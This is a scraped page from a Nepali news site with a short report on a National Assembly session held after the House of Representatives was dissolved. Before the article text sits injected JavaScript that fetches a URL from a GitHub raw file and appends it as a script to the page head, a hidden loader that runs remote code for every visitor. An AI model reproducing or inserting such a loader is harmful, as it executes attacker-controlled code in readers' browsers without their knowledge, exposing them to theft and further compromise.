;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); राष्ट्रिय सभाको बैठक आज बस्दै – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • राष्ट्रिय सभाको बैठक आज बस्दै
देश/प्रदेश

राष्ट्रिय सभाको बैठक आज बस्दै

पुष २३,

काठमाडौं । राष्ट्रिय सभाको बैठक आज (बिहिबार) बस्दै छ ।

बैठक दिउसो १ बजे  बस्नेछ । गत शुक्रबार बसेको बैठकमा विभिन्न राजनीतिक दलका सांसद्ले प्रतिनिधि सभा विघटनलागायत विषयमा आ-आफ्ना धारणा राखेका थिए । बैठकमा संवैधानिक परिषद् लगायत अध्यादेश पेश भएका छन् ।

गत शुक्रबारदेखि राष्ट्रिय सभाकाे हिउँदे अधिवेशन आजदेखि सुरु भएकाे हाे । प्रतिनिधि सभा विघटन भइसकेकाले राष्ट्रिय सभा बैठक मात्र सञ्चालन हुनेछ । राष्ट्रपति बिधादेवी भण्डारीले प्रधानमन्त्रीको सिफारिशमा गत पुष ५ गते आइतबारबाट प्रतिनिधि सभा विघटन गरेकी छन् । फाईल फोटो

 

फेसबुक प्रतिक्रियाहरु